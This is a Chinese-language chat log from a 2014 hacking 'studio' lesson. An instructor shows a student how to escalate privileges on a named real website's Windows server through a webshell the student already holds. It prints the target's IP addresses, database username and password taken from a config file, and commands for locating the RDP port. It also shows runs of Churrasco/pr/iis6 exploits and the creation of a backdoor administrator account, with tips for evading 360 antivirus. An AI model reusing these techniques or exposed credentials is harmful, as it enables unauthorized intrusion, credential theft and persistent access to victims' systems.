╭──────────────────────────╮ 猫客工作室--真诚、高效、创新,敢想敢做努力做到最好! ╰──────────────────────────╯ >讲师名称:剑眉大侠(QQ767501681) >动画名称:实战提权学员(重量)给的shell 学员|重量 2014/3/22 23:48:57 看下这个 提权怎么弄 剑眉大侠 2014/3/22 23:49:11 发 学员|重量 2014/3/22 23:49:12 http://www.wjbyxx.net/showse.aspx r00ts 学员|重量 2014/3/22 23:49:52 不到300个 03的 开了33889 你看能不能提下 剑眉大侠 2014/3/22 23:50:35 我知道了 我现在提 剑眉大侠 2014/3/22 23:52:08 主要是有杀软, 我换换exp 学员|重量 2014/3/22 23:52:20 嗯 360 剑眉大侠 2014/3/22 23:53:06 你在学院群问问谁有免杀EXP 剑眉大侠 2014/3/22 23:53:12 丢个进去执行一下就ok 补丁那么少,提下希望很大 我丢了挺多都被杀了 学员|重量 2014/3/22 23:53:29 嗯 剑眉大侠 2014/3/22 23:59:58 DB权限没法执行命令。。 学员|重量 0:00:27 。。。 貌似需要sa吧 剑眉大侠 0:00:46 肯定啊 只能exp提权了 剑眉大侠 0:01:06 补丁很少 多找几个免杀exp扔上去执行就ok 学员|重量 0:01:36 我没几个exp 毕竟刚接触提权。。。 剑眉大侠 0:01:58 我工具包啊 360安全中心 Microsoft SQL Server 2005 127.0.0.1 : 1433 ................................. Open 127.0.0.1 : 3389 ................................. Close ? Server Ip : 108.108.7.13:80 ? Terminal Port : 3389 PROCESSOR_ARCHITECTURE=x86 0xd3d d3d=3389 十六进制加密 查看终端命令: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 解密地址:http://www.zhuanhuanqi.com/danwei/jinzhi.html Query user 查看系统 当前登录的用户 主要获取指定账户的id号 Logoff id号 注销指定账户 >administrator console 0 运行中 . 2014-3-7 12:58 Administrator killer 命令成功完成。 处理器: 安装了 2 个处理器。 修补程序: 安装了 387 个修补程序。 ZhuDongFangYu.exe 360在运行着,找找mssql信息 '如果是SQL数据库,请认真修改好以下数据库选项 Const SqlUsername = "byxxweb" 'SQL数据库用户名 Const SqlPassword = "byxxweb369258" 'SQL数据库用户密码 Const SqlDatabaseName = "byxx" 'SQL数据库名 Const SqlHostIP = "192.168.0.2" 'SQL主机IP地址。本地(指网站与数据库在同一台服务器上)可用“(local)”或“127.0.0.1”,非本机(指网站与数据库分别在不同的服务器上)请填写数据库服务器的真实IP) 不是SA权限?SrvRoleMember : db_owner 没法执行命令,权限不够,必须是SA,放弃这个思路,只能溢出提权了,服务器上装有360并且运行着,我们只能找免杀的exp C:\windows\temp\cookies\ 对路径“C:\windows\temp\cookies\Churrasco.txt”的访问被拒绝。 D:\RECYCLER\iis6.exe \\ 的用户帐户 ------------------------------------------------------------------------------- 888 Administrator ASPNET Guest IUSR_DOLPHIN IWAM_DOLPHIN killer SUPPORT_388945a0 命令运行完毕,但发生一个或多个错误。 技巧2:执行net user jianmei daxia.asd /add没回显的时候,可以去掉一个d,这样试试:net user jianmei daxia.asd /ad D:\RECYCLER\iis6.exe "net localgroup administrators jianmei /ad" 技巧1:如果可以添加用户但添加不到管理组,有可能administrators改名了,net user administrator 看下本地组成员*administrators 本地组成员 *Administrators 技巧3:如果exp执行很多命令都行,唯独增加用户不行,有可能是密码太简单或太复杂,试试数字+字母+符号组合,并且最低14位 提权成功了 讲一个提权执行exp的技巧 C:\windows\temp\cookies\pr.txt 是因为EXP调用系统权限来执行命令的时候,CMD没有权限执行,所以这个时候我们要赋予CMD同样的权限来执行 但是这个执行就可以执行了,一般是这样执行对把 ?C:\windows\temp\cookies\pr.txt “命令” 当出现权限问题的提示时,比如错误多少,pid值多少的时候,我们这样执行: /c ""C:\windows\temp\cookies\pr.txt" "C:\windows\temp\cookies\cmd.txt /c 命令"" 大家注意最旁边两个双引号,还有/c 一定要带上的,在aspx里,/c是必须带上的 大家看到没有,这样执行就ok了。通常出现权限执行不了的时候,比如错误多少,pid值多少的时候,很多人以为是EXP问题,以为是补丁打了的问题,但是查询补丁,压根就木有打上PR的补丁,所以说,是权限问题 大家对照pr的补丁即可,其他EXP执行方法一样使用! 108.108.7.13 3389没开? 58.216.216.11 这里就不继续弄了,提权成功演示过程就ok。